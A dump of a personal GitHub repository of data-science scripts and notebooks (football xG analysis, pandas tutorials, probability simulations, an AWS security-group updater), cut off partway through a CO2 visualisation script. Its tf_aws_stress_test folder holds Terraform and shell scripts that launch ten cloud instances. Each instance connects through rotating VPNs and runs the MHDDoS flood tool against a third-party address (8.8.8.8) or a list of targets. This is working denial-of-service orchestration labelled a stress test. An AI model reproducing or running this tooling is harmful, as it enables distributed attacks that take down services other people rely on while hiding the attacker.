├── images
    ├── leagues.jpg
    ├── seasons.jpg
    ├── full_table.JPG
    ├── understat.JPG
    ├── requests_response_1.jpg
    └── requests_response_2.jpg
├── README.md
├── .gitignore
├── data-visualisation-bokeh.py
├── data
    ├── cart.csv
    ├── results.csv
    └── dead_rusnia.csv
├── luck.py
├── playground.py
├── tf_aws_stress_test
    ├── go.sh
    ├── main.tf
    └── generate.sh
├── add_two_numbers_as_linked_list.py
├── select_random_hashtags.py
├── longest_palindromic_substring.py
├── time-series.py
├── 538_xG_data.py
├── task_glovo.py
├── time-checks-generalized-experiment.py
├── leveraging-dataframes-in-python.py
├── update_aws_sg.py
├── time-checks.py
├── leveraging-dataframes-in-python.ipynb
├── co2_world.py
├── lambda_web_scraper.py
├── circle.html
├── data_manipulation_with_standard_lib.ipynb
├── football_why_winners_win_and_losers_loose.ipynb
├── co2-bokeh.ipynb
├── is_football_fair.ipynb
└── E-Commerce_ Predicting Sales.ipynb


/images/leagues.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/leagues.jpg


--------------------------------------------------------------------------------
/images/seasons.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/seasons.jpg


--------------------------------------------------------------------------------
/images/full_table.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/full_table.JPG


--------------------------------------------------------------------------------
/images/understat.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/understat.JPG


--------------------------------------------------------------------------------
/images/requests_response_1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_1.jpg


--------------------------------------------------------------------------------
/images/requests_response_2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_2.jpg


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Notebooks for Articles
2 | 
3 | Repository with random scripts and IPython Notebooks that I use to write my articles
4 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | .idea/*
 2 | /*.csv
 3 | *.png
 4 | # *.jpg
 5 | .ipynb_checkpoints
 6 | .terraform*
 7 | *tfstate*
 8 | tf_aws_stress_test/targets_l4.txt
 9 | tf_aws_stress_test/targets_l7.txt
10 | venv/


--------------------------------------------------------------------------------
/data-visualisation-bokeh.py:
--------------------------------------------------------------------------------
1 | from bokeh.io import output_file, show
2 | from bokeh.plotting import figure
3 | plot = figure(plot_width=400, tools='pan,box_zoom')
4 | plot.circle([1,2,3,4,5], [8,6,5,2,3])
5 | output_file('circle.html')
6 | show(plot)
7 | 


--------------------------------------------------------------------------------
/data/cart.csv:
--------------------------------------------------------------------------------
1 | name,color,category,price,quantity 
2 | t-shirt,black,top,20,1
3 | pants,white,bottom,50,1
4 | blazer,yellow,top,100,1
5 | t-shirt,red,top,15,2
6 | t-shirt,orange,top,25,1
7 | sneakers,white,footwear,100,1
8 | bracelet,green,accesories,5,3


--------------------------------------------------------------------------------
/luck.py:
--------------------------------------------------------------------------------
 1 | import numpy as np
 2 | 
 3 | luck = 777
 4 | actions = 100000
 5 | total_hits = []
 6 | 
 7 | for i in range(actions):
 8 |     a = np.random.randint(0, 1000)
 9 |     if a == luck:
10 |         total_hits.append(i)
11 | 
12 | 
13 | print(total_hits)
14 | print(len(total_hits))
15 | 


--------------------------------------------------------------------------------
/playground.py:
--------------------------------------------------------------------------------
 1 | import pandas as pd
 2 | import requests
 3 | from bs4 import BeautifulSoup
 4 | 
 5 | # df = pd.read_csv('data/data_blog.csv')
 6 | 
 7 | res = requests.get('https://understat.com/league/La_liga/2017/')
 8 | 
 9 | soup = BeautifulSoup(res.content)
10 | # print(soup.prettify())
11 | 
12 | table = soup.findAll('script')
13 | table
14 | 


--------------------------------------------------------------------------------
/data/results.csv:
--------------------------------------------------------------------------------
 1 | team1,team2,goals1,goals2,result
 2 | Barcelona,Granada,4,0,1
 3 | Barcelona,Sevilla,1,1,X
 4 | Barcelona,Athletic,2,1,1
 5 | Barcelona,Cadiz,1,2,2
 6 | Barcelona,Valencia,0,0,X
 7 | Barcelona,Celta,3,2,1
 8 | Barcelona,Girona,6,1,1
 9 | Barcelona,Osasuna,1,0,1
10 | Barcelona,Real Madrid,4,0,1
11 | Barcelona,Betis,4,4,X
12 | Barcelona,Villarreal,4,2,1


--------------------------------------------------------------------------------
/tf_aws_stress_test/go.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1
 3 | set -x
 4 | 
 5 | cd /home/ubuntu/MHDDoS
 6 | source venv/bin/activate
 7 | 
 8 | echo 'Starting'
 9 | # sudo /etc/init.d/windscribe-cli start
10 | windscribe connect "Rakia"
11 | 
12 | python3 start.py TCP 8.8.8.8:80 512 60 true
13 | python3 start.py TCP 8.8.8.8:443 512 60 true
14 | 
15 | windscribe disconnect
16 | deactivate
17 | echo 'Finished, shutting down...'
18 | 
19 | # sudo shutdown


--------------------------------------------------------------------------------
/add_two_numbers_as_linked_list.py:
--------------------------------------------------------------------------------
 1 | # Definition for singly-linked list.
 2 | class ListNode(object):
 3 |   def __init__(self, x):
 4 |     self.val = x
 5 |     self.next = None
 6 | 
 7 | class Solution:
 8 |   def addTwoNumbers(self, l1, l2, c = 0):
 9 |     # Fill this in.
10 | 
11 | l1 = ListNode(2)
12 | l1.next = ListNode(4)
13 | l1.next.next = ListNode(3)
14 | 
15 | l2 = ListNode(5)
16 | l2.next = ListNode(6)
17 | l2.next.next = ListNode(4)
18 | 
19 | result = Solution().addTwoNumbers(l1, l2)
20 | while result:
21 |   print result.val,
22 |   result = result.next
23 | # 7 0 8
24 | 


--------------------------------------------------------------------------------
/select_random_hashtags.py:
--------------------------------------------------------------------------------
 1 | import numpy as np
 2 | import pandas as pd
 3 | 
 4 | 
 5 | file = 'data/hashtags.csv'
 6 | 
 7 | data = pd.read_csv(file)
 8 | 
 9 | amount_of_tags = 27
10 | selected_tags = []
11 | top_limit = len(data)
12 | 
13 | for i in range(top_limit):
14 |     rand_ind = np.random.randint(0, top_limit)
15 |     to_select = data.iloc[rand_ind, 0]
16 |     selected_tags.append(to_select)
17 |     data.drop([rand_ind], axis=0)
18 |     if len(selected_tags) == amount_of_tags:
19 |         break
20 | 
21 | for i in range(amount_of_tags):
22 |     print('#'+selected_tags[i])
23 | 


--------------------------------------------------------------------------------
/longest_palindromic_substring.py:
--------------------------------------------------------------------------------
 1 | class Solution:
 2 |     def longest_palindrome(self, s):
 3 |         if s == s[::-1]:
 4 |             return s
 5 |         max_len = 2
 6 |         winners = []
 7 |         for i in range(len(s)):
 8 |             for ln in range(i+1, len(s)+1):
 9 |                 ss = s[i:ln]
10 |                 if ss == ss[::-1]:
11 |                     if len(ss) >= max_len:
12 |                         max_len = len(ss)
13 |                         winners.append(ss)
14 | 
15 |         winners = [x for x in winners if len(x) == max_len]
16 | 
17 |         return winners
18 | 
19 | st = "aamamamnaa"
20 | print(Solution().longest_palindrome(st))
21 | 
22 | 


--------------------------------------------------------------------------------
/tf_aws_stress_test/main.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_providers {
 3 |     aws = {
 4 |       source  = "hashicorp/aws"
 5 |       version = "~> 3.27"
 6 |     }
 7 |   }
 8 | 
 9 |   required_version = ">= 0.14.9"
10 | }
11 | 
12 | provider "aws" {
13 |   profile = "default"
14 |   region  = "eu-west-1"
15 | }
16 | 
17 | resource "aws_instance" "android_terminator" {
18 | 
19 |   count = 10
20 | 
21 |   ami             = "ami-0e0f48e669d76f99d"
22 |   instance_type   = "t2.micro"
23 |   security_groups = ["no-security-no-cry"]
24 |   user_data       = "${file("go_${count.index}.sh")}"
25 | 
26 |   tags = {
27 |     Name = "article-${count.index}"
28 |   }
29 |   volume_tags = {
30 |     "Name" = "article-${count.index}"
31 |   }
32 | }


--------------------------------------------------------------------------------
/time-series.py:
--------------------------------------------------------------------------------
 1 | import pandas as pd
 2 | import numpy as np
 3 | import matplotlib.pyplot as plt
 4 | import glob
 5 | import seaborn as sns
 6 | 
 7 | sns.set()
 8 | 
 9 | pattern = 'data/madrid*.csv'
10 | csv_files = glob.glob(pattern)
11 | 
12 | frames = []
13 | 
14 | for csv in csv_files:
15 |     df = pd.read_csv(csv, index_col='date', parse_dates=True)
16 |     frames.append(df)
17 | 
18 | df = pd.concat(frames)
19 | 
20 | df_time = df[['O_3', 'PM10']][df['station'] == 28079008].dropna()
21 | 
22 | df.sort_values
23 | 
24 | df_plot = df_time.resample('M').mean()
25 | plt.plot(df_plot)
26 | plt.title('O3 and PM10 air polution levels')
27 | plt.ylabel('micrograms per cubic meter (mg/m3)')
28 | plt.xticks(rotation=45)
29 | plt.show()
30 | 


--------------------------------------------------------------------------------
/538_xG_data.py:
--------------------------------------------------------------------------------
 1 | import pandas as pd
 2 | 
 3 | URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv'
 4 | data = pd.read_csv(URL)
 5 | 
 6 | championship = data[data['league'] == 'English League Championship']
 7 | championship = championship[['season', 'date', 'team1', 'team2', 'xg1', 'xg2']]
 8 | championship['xga1'] = championship['xg2']
 9 | championship['xga2'] = championship['xg1']
10 | 
11 | home_data = championship[['season', 'team1', 'xg1', 'xga1']]
12 | away_data = championship[['season', 'team2', 'xg2', 'xga2']]
13 | 
14 | home_groupped = home_data.groupby(['season', 'team1']).mean().reset_index()
15 | away_groupped = away_data.groupby(['season', 'team2']).mean().reset_index()
16 | 
17 | final_data = pd.merge(home_groupped, away_groupped, left_on=['team1','season'], right_on=['team2','season'])
18 | final_data.drop(['team2'], axis='columns', inplace=True)
19 | final_data.rename({'team1': 'team', 'xg1': 'xG_h', 'xga1': 'xGA_h', 'xg2': 'xG_a', 'xga2': 'xGA_a'}, axis='columns', inplace=True)
20 | 
21 | final_data.to_csv('data/xGA_championship.csv', index=False)
22 | print("Done!")


--------------------------------------------------------------------------------
/task_glovo.py:
--------------------------------------------------------------------------------
 1 | heights = [9,8,7,8,9,5,6]
 2 | # heights = [1,9,3,3,5,5,3,5,7,3]
 3 | ln = len(heights)
 4 | total_sum = 0
 5 |             
 6 |             
 7 | def find_hole(heights):
 8 |     first_max = 0
 9 |     ind_first_max = 0
10 |     second_max = 0
11 |     ind_second_max = 0
12 |     # find borders
13 |     for ind, h in enumerate(heights):
14 |         if h > first_max:
15 |             ind_first_max, first_max = ind_second_max, second_max
16 |             ind_first_max, first_max = ind, h
17 |         elif (h >= second_max and ind != ind_first_max):
18 |             ind_second_max, second_max = ind, h
19 | 
20 |     # if borders create a hole, calculate the volume
21 |     if abs(ind_first_max-ind_second_max) > 1:
22 |         reverse = []
23 |         for h in heights[ind_first_max:ind_second_max+1]:
24 |             reverse.append(second_max-h)
25 |         part_sum = sum([x for x in reverse if x>0])
26 |     else:
27 |         part_sum = 0
28 |         
29 |     return part_sum, ind_first_max, ind_second_max
30 | 
31 | 
32 | start = 0
33 | finish = ln
34 | # go through the list looking for holes and calculating its volumes till the end
35 | while finish - start > 1:    
36 |     part_sum, ind_first_max, ind_second_max = find_hole(heights[start:finish])
37 |     total_sum += part_sum
38 |     start += max([ind_second_max,ind_first_max])
39 |     
40 |     
41 | print("Total sum: "+str(total_sum))


--------------------------------------------------------------------------------
/tf_aws_stress_test/generate.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | rm -rf go_*.sh
 3 | 
 4 | # Params
 5 | LAYER=$1
 6 | TARGETS=$2
 7 | 
 8 | VPNS=("Goodbye Lenin" "Hermitage" "Shnur" "Rakia")
 9 | MAX_INDEX=$(expr ${#VPNS[@]} - 1)
10 | COUNTER=0
11 | 
12 | while IFS="" read -r TARGET || [ -n "${TARGET}" ]
13 | do
14 |     RAND=$(shuf -i 0-${MAX_INDEX} -n 1)
15 |     VPN=${VPNS[${RAND}]}
16 |     if [[ $LAYER -eq 4 ]]
17 |         then
18 |     # Template
19 | cat << EOF > go_$COUNTER.sh
20 | #!/bin/bash
21 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1
22 | set -x
23 | 
24 | cd /home/ubuntu/MHDDoS
25 | source venv/bin/activate
26 | 
27 | echo 'Starting'
28 | windscribe connect "$VPN" # vpn name as param from list
29 | 
30 | python3 start.py $TARGET 256 3600 true # from list
31 | 
32 | windscribe disconnect
33 | deactivate
34 | echo 'Finished, shutting down...'
35 | 
36 | sudo shutdown
37 | EOF
38 |     fi
39 |     if [[ $LAYER -eq 7 ]]
40 |         then
41 | # Template
42 | cat << EOF > go_$COUNTER.sh
43 | #!/bin/bash
44 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1
45 | set -x
46 | 
47 | cd /home/ubuntu/MHDDoS
48 | source venv/bin/activate
49 | 
50 | echo 'Starting'
51 | windscribe connect "$VPN" # vpn name as param from list
52 | 
53 | python3 start.py $TARGET 5 256 "" 200 60 true # from list
54 | 
55 | windscribe disconnect
56 | deactivate
57 | echo 'Finished, shutting down...'
58 | 
59 | sudo shutdown
60 | EOF
61 |     fi
62 |     let COUNTER=${COUNTER}+1
63 | done < ${TARGETS}


--------------------------------------------------------------------------------
/time-checks-generalized-experiment.py:
--------------------------------------------------------------------------------
 1 | import numpy as np
 2 | import matplotlib.pyplot as plt
 3 | import seaborn as sns
 4 | 
 5 | sns.set()
 6 | 
 7 | amount_of_checks = 1000  # how many times a person checks her/his phone
 8 | 
 9 | np.random.seed(666)
10 | a = np.random.binomial(amount_of_checks, 0.044, size=10000)
11 | p_a_2 = np.sum(a > 1) / 10000
12 | p_a_3 = np.sum(a > 2) / 10000
13 | p_a_4 = np.sum(a > 3) / 10000
14 | print(" === Assuming average person checks their phone " + str(amount_of_checks) + " times per day === ")
15 | print("Probability of seeing 'lucky time' two times per day: "
16 |       + str(p_a_2) + ", three: " + str(p_a_3) + ", four: " + str(p_a_4))
17 | 
18 | n_sequential = 0
19 | size = amount_of_checks
20 | sample = 1000000
21 | 
22 | for s in range(sample):
23 |     rare = np.random.random(size=size) < 0.044
24 |     n_rare = np.sum(rare)
25 |     if n_rare > 1:
26 |         for i in range(size):
27 |             if i == size-1:
28 |                 break
29 |             elif rare[i] is True & rare[i+1] is True:
30 |                 n_sequential += 1
31 |     if s % 1000 == 0:
32 |         print('Processed: ' + str(s) + ' samples.')
33 | 
34 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample)))
35 | 
36 | bins = np.arange(0, max(a) + 1.5) - 0.5
37 | 
38 | # plt.subplot(3, 1, 1)
39 | plt.hist(a, bins=bins, normed=True, color='red')
40 | plt.title('Phone usage')
41 | plt.xlabel('Amount of "lucky hours spotted during the day"')
42 | plt.ylabel('Probability')
43 | plt.show()
44 | 


--------------------------------------------------------------------------------
/leveraging-dataframes-in-python.py:
--------------------------------------------------------------------------------
 1 | import pandas as pd
 2 | import numpy as np
 3 | 
 4 | cols = ['col0', 'col1', 'col2', 'col3', 'col4']
 5 | rows = ['row0', 'row1', 'row2', 'row3', 'row4']
 6 | data = np.random.randint(0, 100, size=(5, 5))
 7 | df = pd.DataFrame(data, columns=cols, index=rows)
 8 | 
 9 | df.head()
10 | 
11 | df['col1']['row1']
12 | 
13 | df.loc['row4', 'col2']
14 | 
15 | df.iloc[4, 2]
16 | 
17 | df_new = df[['col1', 'col2']]
18 | df_new.head(3)
19 | 
20 | df_new = df[['col1', 'col2']][1:4]
21 | df_new.head(3)
22 | 
23 | df['col0']
24 | df.loc[:, 'col0']
25 | df.iloc[:, 0]
26 | 
27 | df['col3'][2:5]
28 | 
29 | df.loc['row1':'row4', :]
30 | df.iloc[1:4, :]
31 | 
32 | df.loc[:, 'col1':'col4']
33 | df.iloc[:, 1:4]
34 | 
35 | df.loc['row1':'row4', 'col1':'col4']
36 | df.iloc[1:4, 1:4]
37 | 
38 | df.loc['row2':'row4', ['col1', 'col3']]
39 | df.iloc[[2, 4], 0:4]
40 | 
41 | df[df['col1'] > 20]
42 | # assigning variable also works
43 | condition = df['col1'] > 20
44 | df[condition]
45 | 
46 | df[(df['col1'] > 25) & (df['col3'] < 30)]  # logical and
47 | df[(df['col1'] > 25) | (df['col3'] < 30)]  # logical or
48 | df[~(df['col1'] > 25)]  # logical not
49 | 
50 | df.iloc[3, 3] = 0
51 | df.iloc[1, 2] = np.nan
52 | df.iloc[4, 0] = np.nan
53 | df['col5'] = 0
54 | df['col6'] = np.NaN
55 | df.head()
56 | 
57 | df.loc[:, df.all()]
58 | 
59 | df.loc[:, df.any()]
60 | 
61 | df.loc[:, df.isnull().any()]
62 | 
63 | df.loc[:, df.notnull().all()]
64 | 
65 | df_na_any = df.dropna(how='any')  # if any value in a row is NaN it will be dropped
66 | df_na_all = df.dropna(how='all', axis=1)  # if all values in a row are NaN it will be dropped
67 | 
68 | # Find a column based on another
69 | df['col1'][df['col2'] > 35]
70 | 
71 | df['col1'][df['col2'] > 35] += 5
72 | df[df['col1'] > 35]
73 | 
74 | df['new_col'] = df['col4'].apply(lambda n: n*2)
75 | 
76 | df.index.str.upper()
77 | 
78 | df.index.map(str.lower)
79 | 
80 | red_vs_blue = {0:'blue', 12:'red'}
81 | 
82 | df['color'] = df['col3'].map(red_vs_blue)
83 | df.head()
84 | 
85 | df['col7'] = df['col3'] + df['col4']
86 | df.head()


--------------------------------------------------------------------------------
/update_aws_sg.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import boto3
 3 | from botocore.exceptions import ClientError
 4 | 
 5 | GROUP_ID = 'GROUP-ID'
 6 | RULE_DESCRIPTION = 'Rule Description'
 7 | NEW_IP = requests.get('http://checkip.amazonaws.com').text[:-1] + '/32'
 8 | OLD_IP = ''
 9 | 
10 | ec2 = boto3.client('ec2')
11 | 
12 | try:
13 |     response = ec2.describe_security_groups(GroupIds=[GROUP_ID])
14 | except ClientError as e:
15 |     print(e)
16 | 
17 | sg = response['SecurityGroups']
18 | for el in range(len(sg)):
19 |     if sg[el]['GroupId'] == GROUP_ID:
20 |         ip_pems = sg[el]['IpPermissions']
21 |         for i in range(len(ip_pems)):
22 |             if ip_pems[i]['IpRanges'][0]['Description'] == RULE_DESCRIPTION:
23 |                 OLD_IP = ip_pems[i]['IpRanges'][0]['CidrIp']
24 |                 print('Old office Ip %s' % OLD_IP)
25 | 
26 | if (OLD_IP != NEW_IP) & (OLD_IP != ''):
27 |     try:
28 |         d = ec2.revoke_security_group_ingress(
29 |             GroupId = GROUP_ID,
30 |             IpPermissions=[
31 |                 {
32 |                     'FromPort': 3306,
33 |                     'ToPort': 3306,
34 |                     'IpProtocol': 'tcp',
35 |                     'IpRanges': [
36 |                         {
37 |                             'CidrIp': OLD_IP,
38 |                             'Description': RULE_DESCRIPTION
39 |                         }
40 |                     ]
41 |                 }
42 |             ]
43 |         )
44 |         print('Ingress successfully removed %s' % d)
45 |     except ClientError as e:
46 |         print(e)
47 |     
48 |     try:
49 |         d = ec2.authorize_security_group_ingress(
50 |             GroupId = GROUP_ID,
51 |             IpPermissions=[
52 |                 {
53 |                     'FromPort': 3306,
54 |                     'ToPort': 3306,
55 |                     'IpProtocol': 'tcp',
56 |                     'IpRanges': [
57 |                         {
58 |                             'CidrIp': NEW_IP,
59 |                             'Description': RULE_DESCRIPTION
60 |                         }
61 |                     ]
62 |                 }
63 |             ]
64 |         )
65 |         print('Ingress successfully set %s' % d)
66 |     except ClientError as e:
67 |         print(e)
68 | 


--------------------------------------------------------------------------------
/time-checks.py:
--------------------------------------------------------------------------------
 1 | import numpy as np
 2 | import matplotlib.pyplot as plt
 3 | import seaborn as sns
 4 | 
 5 | sns.set()
 6 | 
 7 | np.random.seed(666)
 8 | a_min = np.random.binomial(28, 0.044, size=10000)
 9 | p_a_min_2 = np.sum(a_min > 1) / 10000
10 | p_a_min_3 = np.sum(a_min > 2) / 10000
11 | p_a_min_4 = np.sum(a_min > 3) / 10000
12 | print(" === Assuming average person checks their phone 28 times per day === ")
13 | print("Probability of seeing 'lucky time' two times per day: "
14 |       + str(p_a_min_2) + ", three: " + str(p_a_min_3) + ", four: " + str(p_a_min_4))
15 | 
16 | a_avg = np.random.binomial(47, 0.044, size=10000)
17 | p_a_avg_2 = np.sum(a_avg > 1) / 10000
18 | p_a_avg_3 = np.sum(a_avg > 2) / 10000
19 | p_a_avg_4 = np.sum(a_avg > 3) / 10000
20 | print(" === Assuming average person checks their phone 47 times per day === ")
21 | print("Probability of seeing 'lucky time' two times per day: "
22 |       + str(p_a_avg_2) + ", three: " + str(p_a_avg_3) + ", four: " + str(p_a_avg_4))
23 | 
24 | a_max = np.random.binomial(86, 0.044, size=10000)
25 | p_a_max_2 = np.sum(a_max > 1) / 10000
26 | p_a_max_3 = np.sum(a_max > 2) / 10000
27 | p_a_max_4 = np.sum(a_max > 3) / 10000
28 | print(" === Assuming average person checks their phone 86 times per day === ")
29 | print("Probability of seeing 'lucky time' two times per day: "
30 |       + str(p_a_max_2) + ", three: " + str(p_a_max_3) + ", four: " + str(p_a_max_4))
31 | 
32 | n_sequential = 0
33 | size = 28
34 | sample = 100000
35 | 
36 | for _ in range(sample):
37 |     rare = np.random.random(size=size) < 0.044
38 |     n_rare = np.sum(rare)
39 |     if n_rare > 1:
40 |         for i in range(size):
41 |             if i == size-1:
42 |                 break
43 |             elif rare[i] is True & rare[i+1] is True:
44 |                 n_sequential += 1
45 | 
46 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample)))
47 | 
48 | bins_min = np.arange(0, max(a_min) + 1.5) - 0.5
49 | bins_avg = np.arange(0, max(a_avg) + 1.5) - 0.5
50 | bins_max = np.arange(0, max(a_max) + 1.5) - 0.5
51 | 
52 | # plt.subplot(3, 1, 1)
53 | plt.hist(a_min, bins=bins_min, normed=True, color='red')
54 | plt.title('Minimum phone usage')
55 | plt.xlabel('Amount of "lucky hours spotted during the day"')
56 | plt.ylabel('Probability')
57 | plt.show()
58 | 
59 | # plt.subplot(3, 1, 2)
60 | plt.hist(a_avg, bins=bins_avg, normed=True, color='green')
61 | plt.title('Average phone usage')
62 | plt.xlabel('Amount of "lucky hours spotted during the day"')
63 | plt.ylabel('Probability')
64 | plt.show()
65 | 
66 | # plt.subplot(3, 1, 3)
67 | plt.hist(a_max, bins=bins_max, normed=True, color='blue')
68 | plt.title('Maximum phone usage')
69 | plt.xlabel('Amount of "lucky hours spotted during the day"')
70 | plt.ylabel('Probability')
71 | plt.show()
72 | 
73 | 


--------------------------------------------------------------------------------
/leveraging-dataframes-in-python.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "code",
  5 |    "execution_count": 3,
  6 |    "metadata": {},
  7 |    "outputs": [],
  8 |    "source": [
  9 |     "import pandas as pd\n",
 10 |     "import numpy as np"
 11 |    ]
 12 |   },
 13 |   {
 14 |    "cell_type": "code",
 15 |    "execution_count": 18,
 16 |    "metadata": {},
 17 |    "outputs": [],
 18 |    "source": [
 19 |     "cols = ['col1', 'col2', 'col3', 'col4', 'col5']\n",
 20 |     "rows = ['row1', 'row2', 'row3', 'row4', 'row5']\n",
 21 |     "df = pd.DataFrame(np.random.randint(0,100,size=(5, 5)), columns=cols, index=rows)"
 22 |    ]
 23 |   },
 24 |   {
 25 |    "cell_type": "code",
 26 |    "execution_count": 20,
 27 |    "metadata": {},
 28 |    "outputs": [
 29 |     {
 30 |      "data": {
 31 |       "text/html": [
 32 |        "<div>\n",
 33 |        "<style>\n",
 34 |        "    .dataframe thead tr:only-child th {\n",
 35 |        "        text-align: right;\n",
 36 |        "    }\n",
 37 |        "\n",
 38 |        "    .dataframe thead th {\n",
 39 |        "        text-align: left;\n",
 40 |        "    }\n",
 41 |        "\n",
 42 |        "    .dataframe tbody tr th {\n",
 43 |        "        vertical-align: top;\n",
 44 |        "    }\n",
 45 |        "</style>\n",
 46 |        "<table border=\"1\" class=\"dataframe\">\n",
 47 |        "  <thead>\n",
 48 |        "    <tr style=\"text-align: right;\">\n",
 49 |        "      <th></th>\n",
 50 |        "      <th>col1</th>\n",
 51 |        "      <th>col2</th>\n",
 52 |        "      <th>col3</th>\n",
 53 |        "      <th>col4</th>\n",
 54 |        "      <th>col5</th>\n",
 55 |        "    </tr>\n",
 56 |        "  </thead>\n",
 57 |        "  <tbody>\n",
 58 |        "    <tr>\n",
 59 |        "      <th>row1</th>\n",
 60 |        "      <td>81</td>\n",
 61 |        "      <td>72</td>\n",
 62 |        "      <td>33</td>\n",
 63 |        "      <td>25</td>\n",
 64 |        "      <td>89</td>\n",
 65 |        "    </tr>\n",
 66 |        "    <tr>\n",
 67 |        "      <th>row2</th>\n",
 68 |        "      <td>84</td>\n",
 69 |        "      <td>39</td>\n",
 70 |        "      <td>19</td>\n",
 71 |        "      <td>85</td>\n",
 72 |        "      <td>55</td>\n",
 73 |        "    </tr>\n",
 74 |        "    <tr>\n",
 75 |        "      <th>row3</th>\n",
 76 |        "      <td>61</td>\n",
 77 |        "      <td>68</td>\n",
 78 |        "      <td>76</td>\n",
 79 |        "      <td>70</td>\n",
 80 |        "      <td>60</td>\n",
 81 |        "    </tr>\n",
 82 |        "    <tr>\n",
 83 |        "      <th>row4</th>\n",
 84 |        "      <td>36</td>\n",
 85 |        "      <td>97</td>\n",
 86 |        "      <td>75</td>\n",
 87 |        "      <td>84</td>\n",
 88 |        "      <td>92</td>\n",
 89 |        "    </tr>\n",
 90 |        "    <tr>\n",
 91 |        "      <th>row5</th>\n",
 92 |        "      <td>72</td>\n",
 93 |        "      <td>48</td>\n",
 94 |        "      <td>19</td>\n",
 95 |        "      <td>35</td>\n",
 96 |        "      <td>69</td>\n",
 97 |        "    </tr>\n",
 98 |        "  </tbody>\n",
 99 |        "</table>\n",
100 |        "</div>"
101 |       ],
102 |       "text/plain": [
103 |        "      col1  col2  col3  col4  col5\n",
104 |        "row1    81    72    33    25    89\n",
105 |        "row2    84    39    19    85    55\n",
106 |        "row3    61    68    76    70    60\n",
107 |        "row4    36    97    75    84    92\n",
108 |        "row5    72    48    19    35    69"
109 |       ]
110 |      },
111 |      "execution_count": 20,
112 |      "metadata": {},
113 |      "output_type": "execute_result"
114 |     }
115 |    ],
116 |    "source": [
117 |     "df.head()"
118 |    ]
119 |   },
120 |   {
121 |    "cell_type": "code",
122 |    "execution_count": null,
123 |    "metadata": {},
124 |    "outputs": [],
125 |    "source": []
126 |   }
127 |  ],
128 |  "metadata": {
129 |   "kernelspec": {
130 |    "display_name": "Python 3",
131 |    "language": "python",
132 |    "name": "python3"
133 |   },
134 |   "language_info": {
135 |    "codemirror_mode": {
136 |     "name": "ipython",
137 |     "version": 3
138 |    },
139 |    "file_extension": ".py",
140 |    "mimetype": "text/x-python",
141 |    "name": "python",
142 |    "nbconvert_exporter": "python",
143 |    "pygments_lexer": "ipython3",
144 |    "version": "3.6.3"
145 |   }
146 |  },
147 |  "nbformat": 4,
148 |  "nbformat_minor": 2
149 | }
150 | 


--------------------------------------------------------------------------------
/co2_world.py:
--------------------------------------------------------------------------------
  1 | import pandas as pd
  2 | import numpy as np
  3 | 
  4 | from bokeh.io import curdoc
  5 | from bokeh.plotting import figure
  6 | from bokeh.models import HoverTool, ColumnDataSource, CategoricalColorMapper, Slider
  7 | from bokeh.palettes import Spectral6
  8 | from bokeh.layouts import widgetbox, row
  9 | 
 10 | # Data cleaning and preparation
 11 | data = pd.read_csv('data/co2_emissions_tonnes_per_person.csv')
 12 | data.head()
 13 | 
 14 | gapminder = pd.read_csv('data/gapminder_tidy.csv')
 15 | gapminder.head()
 16 | 
 17 | df = gapminder[['Country', 'region']].drop_duplicates()
 18 | data_with_regions = pd.merge(data, df, left_on='country', right_on='Country', how='inner')
 19 | data_with_regions = data_with_regions.drop('Country', axis='columns')
 20 | data_with_regions.head()
 21 | 
 22 | new_df = pd.melt(data_with_regions, id_vars=['country', 'region'])
 23 | new_df.head()
 24 | 
 25 | columns = ['country', 'region', 'year', 'co2']
 26 | new_df.columns = columns
 27 | 
 28 | upd_new_df = new_df[new_df['year'].astype('int64') > 1963]
 29 | upd_new_df.info()
 30 | upd_new_df = upd_new_df.sort_values(by=['country', 'year'])
 31 | upd_new_df['year'] = upd_new_df['year'].astype('int64')
 32 | 
 33 | df_gdp = gapminder[['Country', 'Year', 'gdp']]
 34 | df_gdp.columns = ['country', 'year', 'gdp']
 35 | df_gdp.info()
 36 | 
 37 | final_df = pd.merge(upd_new_df, df_gdp, on=['country', 'year'], how='left')
 38 | final_df = final_df.dropna()
 39 | final_df.head()
 40 | 
 41 | np_co2 = np.array(final_df['co2'])
 42 | np_gdp = np.array(final_df['gdp'])
 43 | np.corrcoef(np_co2, np_gdp)
 44 | 
 45 | # Creating visualization app with Bokeh.io
 46 | regions_list = final_df.region.unique().tolist()
 47 | color_mapper = CategoricalColorMapper(factors=regions_list, palette=Spectral6)
 48 | 
 49 | # Make the ColumnDataSource: source
 50 | source = ColumnDataSource(data={
 51 |     'x': final_df.gdp[final_df['year'] == 1964],
 52 |     'y': final_df.co2[final_df['year'] == 1964],
 53 |     'country': final_df.country[final_df['year'] == 1964],
 54 |     'region': final_df.region[final_df['year'] == 1964],
 55 | })
 56 | 
 57 | # Save the minimum and maximum values of the gdp column: xmin, xmax
 58 | xmin, xmax = min(final_df.gdp), max(final_df.gdp)
 59 | 
 60 | # Save the minimum and maximum values of the co2 column: ymin, ymax
 61 | ymin, ymax = min(final_df.co2), max(final_df.co2)
 62 | 
 63 | # Create the figure: plot
 64 | plot = figure(title='Gapminder Data for 1964', plot_height=600, plot_width=1000,
